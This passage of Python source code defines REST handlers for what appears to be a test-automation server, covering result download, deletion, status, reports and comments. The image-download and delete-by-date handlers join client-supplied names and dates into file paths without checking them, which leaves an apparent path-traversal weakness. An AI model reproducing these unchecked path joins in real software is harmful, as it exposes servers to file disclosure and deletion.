trxPath = "%s/%s" % (testPath, trName)
success, _, nameFile, extFile, _, b64result, _, _ = RepoArchives.instance().getFile(pathFile=trxPath,
project='',
addLock=False)
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("Result file not found")
if success != Context.instance().CODE_OK:
raise HTTP_500("Unable to get file, check log in server side")
return {"cmd": self.request.path,
'test-id': testId,
'project-id': projectId,
'result': b64result,
'result-name': nameFile,
"result-extension": extFile}
class ResultsDownloadImage(HandlerCORS):
"""
/rest/results/download/image
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Get image (png or jpg) from test result
description: ''
operationId: resultsDownloadImage
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id, image-name ]
properties:
test-id:
type: string
project-id:
type: integer
image-name:
type: string
responses:
'200':
description: image
schema :
properties:
cmd:
type: string
image:
type: string
description: in base64
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/download/image",
"image": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
imageName = self.request.data.get("image-name")
if imageName is None:
raise EmptyValue("Please specify a image name")
testId = self.request.data.get("test-id")
if testId is None:
raise EmptyValue("Please specify a project id and test id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# extract the real test path according the test id
founded, testPath = RepoArchives.instance().findTrInCache(projectId=projectId,
testId=testId,
returnProject=False)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('test not found')
imagePath = "%s/%s" % (testPath, imageName)
success, _, _, _, _, b64img, _, _ = RepoArchives.instance().getFile(pathFile=imagePath,
project=projectId,
addLock=False)
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("Image not found")
if success != Context.instance().CODE_OK:
raise HTTP_500("Unable to get file, check logs in server side")
return {"cmd": self.request.path, 'test-id': testId,
'project-id': projectId, 'image': b64img}
class ResultsRemoveById(HandlerCORS):
"""
/rest/results/remove/by/id
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Remove a test result according to the test id provided
description: ''
operationId: resultsRemoveById
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: string
responses:
'200':
description: remove result
schema :
properties:
cmd:
type: string
message:
type: string
description: message
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/remove",
"message": "xxxx",
"project-id": 25
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a test id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('test not found')
success = RepoArchives.instance().delDirAll(pathFolder=testPath, project='')
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to remove test result")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500("Unable to remove test result (missing)")
if success == Context.instance().CODE_FORBIDDEN:
raise HTTP_403("Cannot remove test result")
return {"cmd": self.request.path, "message": "test result successfully removed",
'project-id': projectId}
class ResultsRemoveByDate(HandlerCORS):
"""
/rest/results/remove/by/date
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Remove all tests results according to the date provided
description: ''
operationId: resultsRemoveByDate
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ date, project-id ]
properties:
date:
type: string
project-id:
type: string
responses:
'200':
description: remove result
schema :
properties:
cmd:
type: string
message:
type: string
description: message
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/remove/by/date",
"message": "xxxxxxx",
"project-id": 25
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
byDate = self.request.data.get("date")
if byDate is None:
raise HTTP_400("Please specify a date")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
success = RepoArchives.instance().delDirAll(pathFolder="%s/%s/" %
(projectId, byDate), project='')
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to remove all tests results")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500("Unable to remove all tests results (missing)")
if success == Context.instance().CODE_FORBIDDEN:
raise HTTP_403("Cannot remove all tests results")
return {"cmd": self.request.path, "message": "all tests results successfully removed",
'project-id': projectId}
class ResultsDetails(HandlerCORS):
"""
/rest/results/details
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Get details of the test result
description: ''
operationId: resultsDetails
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
results:
type: string
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/details",
"project-id": 25
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a list of test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
_log_index = self.request.data.get("log-index")
if _log_index is None:
_log_index = 0
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(projectId=projectId,
testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result not found')
state = RepoArchives.instance().getTrState(trPath=testPath)
verdict = RepoArchives.instance().getTrEndResult(trPath=testPath)
logs, logs_index = RepoArchives.instance().getTrLogs(trPath=testPath,
log_index=_log_index)
return {"cmd": self.request.path,
'test-id': testId,
'test-status': state,
'test-verdict': verdict,
'test-logs': logs,
'test-logs-index': logs_index}
class ResultsFollow(HandlerCORS):
"""
/rest/results/follow
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Follow the result of one or several tests
description: ''
operationId: resultsFollow
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-ids, project-id ]
properties:
test-ids:
type: string
project-id:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
results:
type: string
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/follow",
"project-id": 25
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testIds = self.request.data.get("test-ids")
if testIds is None:
raise HTTP_400(
"Please specify a project id and a list of test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
results = []
for testId in testIds:
result = {"id": testId}
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('test not found')
state = RepoArchives.instance().getTrState(trPath=testPath)
verdict = RepoArchives.instance().getTrEndResult(trPath=testPath)
progress = RepoArchives.instance().getTrProgress(trPath=testPath)
result["result"] = {
"state": state,
"verdict": verdict,
"progress": progress['percent']}
description = RepoArchives.instance().getTrDescription(trPath=testPath)
result.update(description)
results.append(result)
return {"cmd": self.request.path,
"results": results, 'project-id': projectId}
class ResultsStatus(HandlerCORS):
"""
/rest/results/status
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Get the status of the test (not-running, running, complete).
description: ''
operationId: resultsStatus
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: string
responses:
'200':
description: result status of a test
schema :
properties:
cmd:
type: string
test-status:
type: string
description: running/not-running/complete
test-progress:
type: integer
description: progress in percent
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/status",
"test-status": "running",
"test-id": "af0b2587-459e-42eb-a4da-e3e6fa227719",
"test-progress": 25
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a list of test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result not found')
state = RepoArchives.instance().getTrState(trPath=testPath)
progress = RepoArchives.instance().getTrProgress(trPath=testPath)
return {"cmd": self.request.path,
'test-id': testId,
'test-status': state,
'test-progress': progress['percent']}
class ResultsVerdict(HandlerCORS):
"""
/rest/results/verdict
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Get the end result of the test (undefined, pass, fail).
description: ''
operationId: resultsVerdict
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: string
responses:
'200':
description: tests end result
schema :
properties:
cmd:
type: string
test-verdict:
type: string
description: undefined, pass, fail
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/verdict",
"test-verdict": "undefined",
"test-id": "af0b2587-459e-42eb-a4da-e3e6fa227719"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a list of test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result not found')
verdict = RepoArchives.instance().getTrEndResult(trPath=testPath)
return {"cmd": self.request.path,
'test-id': testId,
'test-verdict': verdict}
class ResultsReportReviews(HandlerCORS):
"""
/rest/results/report/reviews
"""
@_to_yaml
def post(self):
"""
tags:
- reports
summary: Get all report reviews
description: ''
operationId: resultsReportReviews
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: integer
replay-id:
type: string
responses:
'200':
description: all test reports
schema :
properties:
cmd:
type: string
test-report:
type: string
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/report/reviews",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"basic-review": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"review": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
_replayId = self.request.data.get("replay-id", 0)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result not found')
ret = {"cmd": self.request.path, 'test-id': testId}
# reviews
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="tbrp")
if success == Context.instance().CODE_OK:
ret["basic-review"] = report
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="trp")
if success == Context.instance().CODE_OK:
ret["review"] = report
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="trpx")
if success == Context.instance().CODE_OK:
ret["xml-review"] = report
return ret
class ResultsReportVerdicts(HandlerCORS):
"""
/rest/results/report/verdicts
"""
@_to_yaml
def post(self):
"""
tags:
- reports
summary: Get all report verdicts.
description: ''
operationId: resultsReportVerdicts
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: integer
replay-id:
type: string
responses:
'200':
description: all test reports
schema :
properties:
cmd:
type: string
test-report:
type: string
description: in base64 and gzipped
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/reports",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"verdict": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"xml-verdict": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
_replayId = self.request.data.get("replay-id", 0)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result not found')
ret = {"cmd": self.request.path, 'test-id': testId}
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="trv")
if success == Context.instance().CODE_OK:
ret["verdict"] = report
else:
self.error("Error to get csv verdict report from test result")
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="tvrx")
if success == Context.instance().CODE_OK:
ret["xml-verdict"] = report
else:
self.error("Error to get csv verdict report from test result")
return ret
class ResultsReportDesigns(HandlerCORS):
"""
/rest/results/report/designs
"""
@_to_yaml
def post(self):
"""
tags:
- reports
summary: Get all report designs
description: ''
operationId: resultsReportDesigns
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: integer
replay-id:
type: string
responses:
'200':
description: all test reports
schema :
properties:
cmd:
type: string
test-report:
type: string
description: in base64 and gzipped
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/reports",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"design": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"xml-design": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
_replayId = self.request.data.get("replay-id", 0)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result not found')
ret = {"cmd": self.request.path, 'test-id': testId}
# designs
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="trd")
if success == Context.instance().CODE_OK:
ret["design"] = report
else:
self.error("Error to get xml report from test result")
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="tdsx")
if success == Context.instance().CODE_OK:
ret["xml-design"] = report
else:
self.error("Error to get xml report from test result")
return ret
class ResultsReportComments(HandlerCORS):
"""
/rest/results/report/comments
"""
@_to_yaml
def post(self):
"""
tags:
- reports
summary: Get all comments in one report
description: ''
operationId: resultsReportComments
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: integer
replay-id:
type: string
responses:
'200':
description: all test reports
schema :
properties:
cmd:
type: string
comments:
type: string
description: in base64 and gzipped
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/reports",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"comments": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
_replayId = self.request.data.get("replay-id", 0)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result not found')
ret = {"cmd": self.request.path, 'test-id': testId}
# comments
success, report = RepoArchives.instance().getTrComments(
trPath=testPath, replayId=_replayId)
if success == Context.instance().CODE_OK:
ret["comments"] = report
else:
self.error("Error to get comments from test result")
return ret
class ResultsReportEvents(HandlerCORS):
"""
/rest/results/report/events
"""
@_to_yaml
def post(self):
"""
tags:
- reports
summary: Get a report of events occured during the test
description: ''
operationId: resultsReportEvents
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: integer
replay-id:
type: string
responses:
'200':
description: all test reports
schema :
properties:
cmd:
type: string
events:
type: string
description: in base64 and gzipped
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/reports",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"events": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
_replayId = self.request.data.get("replay-id", 0)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result not found')
ret = {"cmd": self.request.path, 'test-id': testId}
# events
success, report = RepoArchives.instance().getTrResume(
trPath=testPath, replayId=_replayId)
if success == Context.instance().CODE_OK:
ret["events"] = report
else:
self.error("Error to get events from test result")
return ret
class ResultsReports(HandlerCORS):
"""
/rest/results/reports
"""
@_to_yaml
def post(self):
"""
tags:
- reports
summary: Get all reports of one test (advanced and basic in all formats).
description: ''
operationId: resultsReports
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: integer
replay-id:
type: string
responses:
'200':
description: all test reports
schema :
properties:
cmd:
type: string
test-report:
type: string
description: in base64 and gzipped
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/reports",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"basic-review": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"review": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"verdict": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"xml-verdict": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"design": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"xml-design": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"comments": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"events": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testId = self.request.data.get("test-id")
if testId is None:
raise HTTP_400("Please specify a test id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
_replayId = self.request.data.get("replay-id", 0)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result not found')
ret = {"cmd": self.request.path, 'test-id': testId}
# reviews
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="tbrp")
if success == Context.instance().CODE_OK:
ret["basic-review"] = report
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="trp")
if success == Context.instance().CODE_OK:
ret["review"] = report
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="trpx")
if success == Context.instance().CODE_OK:
ret["xml-review"] = report
# verdicts
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="trv")
if success == Context.instance().CODE_OK:
ret["verdict"] = report
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="tvrx")
if success == Context.instance().CODE_OK:
ret["xml-verdict"] = report
# designs
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="trd")
if success == Context.instance().CODE_OK:
ret["design"] = report
success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
replayId=_replayId,
trExt="tdsx")
if success == Context.instance().CODE_OK:
ret["xml-design"] = report
# comments
success, report = RepoArchives.instance().getTrComments(
trPath=testPath, replayId=_replayId)
if success == Context.instance().CODE_OK:
ret["comments"] = report
# events
success, report = RepoArchives.instance().getTrResume(
trPath=testPath, replayId=_replayId)
if success == Context.instance().CODE_OK:
ret["events"] = report
return ret
class ResultsCommentAdd(HandlerCORS):
"""
/rest/results/comment/add
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Add a comment in a test result
description: ''
operationId: resultsCommentAdd
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, comment, timestamp, project-id ]
properties:
test-id:
type: string
project-id:
type: integer
replay-id:
type: string
comment:
type: string
timstamp:
type: string
responses:
'200':
description:
schema :
properties:
cmd:
type: string
result:
type: string
description: in base64
result-name:
type: string
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/download/result",
"result": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"result-name": "....",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"save-as": False,
"save-as-dest: ""
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result by id not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
comment = self.request.data.get("comment")
timestamp = self.request.data.get("timestamp")
if projectId is None:
raise EmptyValue("Please specify a project id")
if comment is None:
raise EmptyValue("Please specify the comment to add")
if timestamp is None:
raise EmptyValue("Please specify a timestamp")
testId = self.request.data.get("test-id")
if testId is None:
raise EmptyValue("Please specify a project id and test id")
_replayId = self.request.data.get("replay-id", 0)
_returnAll = self.request.data.get("return-all", True)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# extract the real test path according the test id
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result by id not found')
founded, trName = RepoArchives.instance().getTrName(
trPath=testPath, replayId=_replayId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('trx not found')
success, _, _, comments = RepoArchives.instance().addComment(archiveUser=user_profile['login'],
archivePath="%s/%s" % (
testPath, trName),
archivePost=comment,
archiveTimestamp=timestamp)
if success != Context.instance().CODE_OK:
raise HTTP_500("Unable to add comment")
rsp = {
"cmd": self.request.path,
'test-id': testId,
'project-id': projectId}
if _returnAll:
rsp["comments"] = comments
else:
rsp["comments"] = []
return rsp
class ResultsCommentsRemove(HandlerCORS):
"""
/rest/results/comment/remove/all
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Remove all comments in test result
description: ''
operationId: resultsCommentsRemoveAll
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: integer
replay-id:
type: string
responses:
'200':
description:
schema :
properties:
cmd:
type: string
result:
type: string
description: in base64
result-name:
type: string
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/download/result",
"result": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"result-name": "....",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"save-as": False,
"save-as-dest: ""
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result by id not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
testId = self.request.data.get("test-id")
if testId is None:
raise EmptyValue("Please specify a project id and test id")
_replayId = self.request.data.get("replay-id", 0)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# extract the real test path according the test id
founded, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result by id not found')
founded, trName = RepoArchives.instance().getTrName(
trPath=testPath, replayId=_replayId)
if founded == Context.instance().CODE_NOT_FOUND:
